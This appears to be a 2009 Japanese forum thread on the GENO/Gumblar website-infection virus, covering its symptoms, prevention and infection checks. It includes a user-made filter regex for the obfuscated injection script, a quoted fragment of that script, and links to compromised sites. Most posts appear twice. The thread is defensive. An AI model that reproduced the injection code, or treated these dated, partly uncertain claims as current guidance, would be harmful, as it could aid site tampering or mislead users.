GENOウイルススレ
1 :192.168.0.774:
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/
|
|
|
2 :192.168.0.774:2009/05/16(土) 14:07:34 ID:EILz2Sb70
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3 :192.168.0.774:2009/05/16(土) 14:08:00 ID:EILz2Sb70
以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html
国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html
国内の正規サイト改ざん:攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4 :192.168.0.774:2009/05/16(土) 14:08:20 ID:EILz2Sb70
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/
5 :192.168.0.774:2009/05/16(土) 14:08:46 ID:EILz2Sb70
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
6 :192.168.0.774:2009/05/16(土) 14:09:24 ID:EILz2Sb70
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
7 :192.168.0.774:2009/05/16(土) 14:10:56 ID:hzDONx9U0
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
8 :192.168.0.774:2009/05/16(土) 14:14:11 ID:cmMngAoD0
9 :192.168.0.774:2009/05/16(土) 14:14:14 ID:v6iqPVHwP
現行スレ
同人板
【管理も】同人サイト・GENOウィルス注意2【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242443932/
セキュリティ板
GENOウイルススレ ★5(実質★6)
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
同人板
【管理も】同人サイト・GENOウィルス注意2【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242443932/
セキュリティ板
GENOウイルススレ ★5(実質★6)
http://pc11.2ch.net/test/read.cgi/sec/1242415108/
10 :192.168.0.774:2009/05/16(土) 14:16:50 ID:EILz2Sb70
11 :192.168.0.774:2009/05/16(土) 14:18:10 ID:hzDONx9U0
ageていきましょう
12 :192.168.0.774:2009/05/16(土) 14:20:02 ID:uAe98uZ60
ん?もう書いてええのん?
13 :192.168.0.774:2009/05/16(土) 14:31:58 ID:tn4HDAid0
IPブロックの纏めテキストと、PG2での導入方法等も纏めた方がよさげか
14 :192.168.0.774:2009/05/16(土) 14:37:33 ID:v6iqPVHwP
まとめると
サイトを開く
↓
htmlに書かれたjsコードが実行される
↓
別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず
↓
実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm
↓
regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。
↓
オワタ
こんな感じでいいのかな。
で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう
って事でいいのかな?今北で情報が多くてよくわからん
サイトを開く
↓
htmlに書かれたjsコードが実行される
↓
別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず
↓
実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm
↓
regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。
↓
オワタ
こんな感じでいいのかな。
で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう
って事でいいのかな?今北で情報が多くてよくわからん
15 :192.168.0.774:2009/05/16(土) 14:38:39 ID:ayXPZTg40
16 :192.168.0.774:2009/05/16(土) 14:47:30 ID:arP7FdRW0
こんなときだからこそ
リンク先の内容も一緒に貼って欲しい
リンク先の内容も一緒に貼って欲しい
17 :192.168.0.774:2009/05/16(土) 14:50:03 ID:ayXPZTg40
ごめん。内容はコレ↓
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)http://pc11.2ch.net/test/read.cgi/sec/1240853183/
対策と駆除はこちら (p)http://www29.atwiki.jp/geno/pages/14.html
Adobe Reader/Flashのアップデートをお忘れ無く (p)http://www.adobe.com/jp/
745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど(p)http://www3.atword.jp/gnome/のサイトにかいてある
(中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)http://pc11.2ch.net/test/read.cgi/sec/1240853183/
対策と駆除はこちら (p)http://www29.atwiki.jp/geno/pages/14.html
Adobe Reader/Flashのアップデートをお忘れ無く (p)http://www.adobe.com/jp/
745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど(p)http://www3.atword.jp/gnome/のサイトにかいてある
(中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
18 :192.168.0.774:2009/05/16(土) 14:51:25 ID:ayXPZTg40
あー・・もうなんかグダグダorz許して
19 :192.168.0.774:2009/05/16(土) 14:53:44 ID:gMiU0OeL0
勘違いする人が増えるような貼りかた止めろ
それ@niftyがホストしてるサイトの一部にってことだろ
それ@niftyがホストしてるサイトの一部にってことだろ
20 :192.168.0.774:2009/05/16(土) 14:55:51 ID:ayXPZTg40
そうなのか。騒いでごめんなさい
21 :192.168.0.774:2009/05/16(土) 15:12:09 ID:v6iqPVHwP
フィルター始めて作ってみたけどどうだろ。
name
test
match
(function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g);
replace
<!-- type hidden --!>
name
test
match
(function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g);
replace
<!-- type hidden --!>
22 :192.168.0.774:2009/05/16(土) 16:39:00 ID:+Kk3rzau0
23 :192.168.0.774:2009/05/16(土) 16:58:38 ID:OzJB1Y+z0
何かギスギスしてんな
24 :192.168.0.774:2009/05/16(土) 18:08:57 ID:L69MESm3O
25 :192.168.0.774:2009/05/16(土) 18:12:33 ID:v6iqPVHwP
どうやらここが次スレになるらしい
あぼん出来るし良かった
あぼん出来るし良かった
26 :192.168.0.774:2009/05/16(土) 18:17:17 ID:cXEySQE80
>>25
向こうに7立ったみたいw
向こうに7立ったみたいw
27 :192.168.0.774:2009/05/16(土) 18:19:07 ID:zXe/9KrE0
俺が立てといた
窓口は多い方がいいと思ってね
窓口は多い方がいいと思ってね
28 :192.168.0.774:2009/05/16(土) 18:21:17 ID:v6iqPVHwP
>>27
随分と荒れた窓口だな
随分と荒れた窓口だな
29 :192.168.0.774:2009/05/16(土) 18:25:02 ID:H7YmOp+10
隔離スレにもなりゃしねぇ
30 :192.168.0.774:2009/05/16(土) 18:57:13 ID:zXe/9KrE0
俺は普通に波風タタサズニ立てたかったんだけどね
31 :192.168.0.774:2009/05/16(土) 23:10:45 ID:WN9EdhyZ0
むしろこっちはまったりやればいい
32 :192.168.0.774:2009/05/17(日) 11:37:22 ID:T9pTie3x0
セキュ板が荒れたので情報まとまらない。
こっちへ移動してきた。ヨロ。
こっちへ移動してきた。ヨロ。
33 :192.168.0.774:2009/05/17(日) 11:37:51 ID:QnwsxDv40
同じく、よろ。
34 :192.168.0.774:2009/05/17(日) 11:39:21 ID:MP/sWvjo0
俺もこっちにしよう
35 :192.168.0.774:2009/05/17(日) 11:40:45 ID:ma6xyjDQ0
ヤレヤレ。こっちまで追いかけてこないでくれればいいんだけど。
36 :192.168.0.774:2009/05/17(日) 11:40:51 ID:FkD7jhlA0
同人板からきました\(^O^)/
37 :192.168.0.774:2009/05/17(日) 11:40:59 ID:dj6spVc50
変な奴もまとめてこっちに来ればいい
まとめてNGできるし
まとめてNGできるし
38 :192.168.0.774:2009/05/17(日) 11:41:36 ID:MP/sWvjo0
39 :192.168.0.774:2009/05/17(日) 11:42:52 ID:DhBs/7gt0
いいんじゃね
40 :192.168.0.774:2009/05/17(日) 11:43:25 ID:5zpzhS0v0
必要な情報は上で揃ってるな
特に追加するようなことは今のところないよね?
特に追加するようなことは今のところないよね?
41 :192.168.0.774:2009/05/17(日) 11:44:03 ID:T9pTie3x0
向こうの最後の方ににあった感染サイト
うこっけい?とかあの辺ってもうまとめに入ってるのかな?
うこっけい?とかあの辺ってもうまとめに入ってるのかな?
42 :192.168.0.774:2009/05/17(日) 11:44:21 ID:gUnnPMxe0
・なんらかの方法によるサーバへの侵入
FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・Webサイトの改ざん
具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを
各ページに埋め込まれます。
%3CsI0cTJrZliptの部分については異なるパターンもあったようです。
・そのほかの詳細は不明です
発見方法
・公開しているすべてのページに該当スクリプトコードが埋め込まれているか
確認してください。その他の影響については詳細不明です。
対処
感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており
管理FTPパスワードの漏洩なのかSQLインジェクション等の
Webアプリ脆弱性を攻撃されたものなのかわかっていません。
改ざんされたスクリプトコードの削除だけで済む問題ではなく
侵入された経路の究明および対策が必要となってくると思われます。
FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・Webサイトの改ざん
具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを
各ページに埋め込まれます。
%3CsI0cTJrZliptの部分については異なるパターンもあったようです。
・そのほかの詳細は不明です
発見方法
・公開しているすべてのページに該当スクリプトコードが埋め込まれているか
確認してください。その他の影響については詳細不明です。
対処
感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており
管理FTPパスワードの漏洩なのかSQLインジェクション等の
Webアプリ脆弱性を攻撃されたものなのかわかっていません。
改ざんされたスクリプトコードの削除だけで済む問題ではなく
侵入された経路の究明および対策が必要となってくると思われます。
43 :192.168.0.774:2009/05/17(日) 11:45:27 ID:QnwsxDv40
何か変化起きた時のために保守気味で進行でいんじゃね?
先週金曜まではそうだったし。
saymoveと同人が来てから無駄に加速したね。
先週金曜まではそうだったし。
saymoveと同人が来てから無駄に加速したね。
44 :192.168.0.774:2009/05/17(日) 11:45:48 ID:Sggs+C2i0
45 :192.168.0.774:2009/05/17(日) 11:46:35 ID:dj6spVc50
同人というより鬼の首とったように
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
46 :192.168.0.774:2009/05/17(日) 11:48:59 ID:T9pTie3x0
静けさが嘘のようだw
47 :192.168.0.774:2009/05/17(日) 11:50:50 ID:6zykGUMd0
よろしくー
48 :192.168.0.774:2009/05/17(日) 11:51:08 ID:MP/sWvjo0
49 :192.168.0.774:2009/05/17(日) 11:51:42 ID:rsI8zkAT0
移動完了
50 :192.168.0.774:2009/05/17(日) 11:53:03 ID:6zykGUMd0
烏骨鶏は凸電誰かしましたか?
放置しておくと大変なことになる
放置しておくと大変なことになる
51 :192.168.0.774:2009/05/17(日) 11:53:07 ID:ffQj4EqF0
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。
もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。
もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
52 :192.168.0.774:2009/05/17(日) 11:56:19 ID:/tk9oSEO0
53 :192.168.0.774:2009/05/17(日) 11:57:28 ID:vLbMFr+GP
誰かタウンページ持ってこい
54 :192.168.0.774:2009/05/17(日) 11:59:04 ID:T9pTie3x0
>>50
流れちゃってわかんないけど、もいっこあった希ガス
流れちゃってわかんないけど、もいっこあった希ガス
>>51
9.1.1で修正された方だと思っていたが・・・。
9.1.1で修正された方だと思っていたが・・・。
56 :192.168.0.774:2009/05/17(日) 11:59:46 ID:6zykGUMd0
ver.9.1ではバッファーオーバーフローの脆弱性あったよね
ver.9.1.1でそれを解決したんじゃない
ver.9.1.1でそれを解決したんじゃない
57 :192.168.0.774:2009/05/17(日) 12:01:29 ID:Sggs+C2i0 BE:762340739-S★(634668)
58 :192.168.0.774:2009/05/17(日) 12:01:52 ID:ffQj4EqF0
>>55
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
59 :192.168.0.774:2009/05/17(日) 12:02:30 ID:2KRNOGSH0
ダメだ。あっちのスレでこっちに誘導してる・・・。
60 :192.168.0.774:2009/05/17(日) 12:04:01 ID:0Et/Qq5U0
61 :192.168.0.774:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
62 :192.168.0.774:2009/05/17(日) 12:05:20 ID:6zykGUMd0
>>61
今日は休みじゃないかな?
今日は休みじゃないかな?
63 :192.168.0.774:2009/05/17(日) 12:06:39 ID:2KRNOGSH0
>>59
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
64 :192.168.0.774:2009/05/17(日) 12:09:32 ID:T9pTie3x0
>>61
うこっけい
http://www.100bangai.co.jp/shop/0443.html
これか?お菓子やさんだったの・・・?
googleからurl検索したらavastさんが怒って焦ったw
うこっけい
http://www.100bangai.co.jp/shop/0443.html
これか?お菓子やさんだったの・・・?
googleからurl検索したらavastさんが怒って焦ったw
65 :192.168.0.774:2009/05/17(日) 12:21:14 ID:6zykGUMd0
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
66 :192.168.0.774:2009/05/17(日) 12:23:41 ID:T9pTie3x0
67 :192.168.0.774:2009/05/17(日) 12:26:11 ID:MP/sWvjo0
68 :192.168.0.774:2009/05/17(日) 12:28:00 ID:PUr+H3m+0
「お宅のHPを見たらウィルスの警告が出てくる。
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
69 :192.168.0.774:2009/05/17(日) 12:29:48 ID:T9pTie3x0
本名で教えても良いけど、ウイルス食らっちゃうような店に
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
70 :192.168.0.774:2009/05/17(日) 12:31:42 ID:6zykGUMd0
こことhxxp://www.ukokkei.co.jp/
専門店街は住所が違うよ
専門店街は住所が違うよ
71 :192.168.0.774:2009/05/17(日) 12:32:07 ID:xG23ce6c0
72 :192.168.0.774:2009/05/17(日) 12:32:20 ID:2KRNOGSH0
IPAも平日しか働いていないのか・・・。
受付時間:平日10:00〜12:00、13:30〜17:00
受付時間:平日10:00〜12:00、13:30〜17:00
73 :192.168.0.774:2009/05/17(日) 12:37:07 ID:6zykGUMd0
とりあえずフリーダイアルで電話して
責任者読んで説明してみる
責任者読んで説明してみる
74 :192.168.0.774:2009/05/17(日) 12:38:07 ID:PUr+H3m+0
75 :192.168.0.774:2009/05/17(日) 12:39:36 ID:T9pTie3x0
>>73
フリーダイアルは専門店街のやつ?
フリーダイアルは専門店街のやつ?
76 :192.168.0.774:2009/05/17(日) 12:41:04 ID:6zykGUMd0
>>75
www.ukokkei.co.jp/ ここ
www.ukokkei.co.jp/ ここ
77 :192.168.0.774:2009/05/17(日) 12:42:49 ID:T9pTie3x0
>>74
プレッシャーかけんなww
so-netの説明がそれなりに説得力あるけど
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
電話だとえっちてーてーぴー.って言わないとダメだな
まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
プレッシャーかけんなww
so-netの説明がそれなりに説得力あるけど
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884
電話だとえっちてーてーぴー.って言わないとダメだな
まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
78 :192.168.0.774:2009/05/17(日) 12:43:13 ID:6zykGUMd0
【本店】のフリーダイヤル
79 :192.168.0.774:2009/05/17(日) 12:45:11 ID:2KRNOGSH0
>>71
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
80 :192.168.0.774:2009/05/17(日) 12:45:45 ID:PUr+H3m+0
電凸用のテンプレも必要になってくるのかな?
>>77へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
>>77へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
81 :192.168.0.774:2009/05/17(日) 12:47:00 ID:6zykGUMd0
電話でない罠>本店
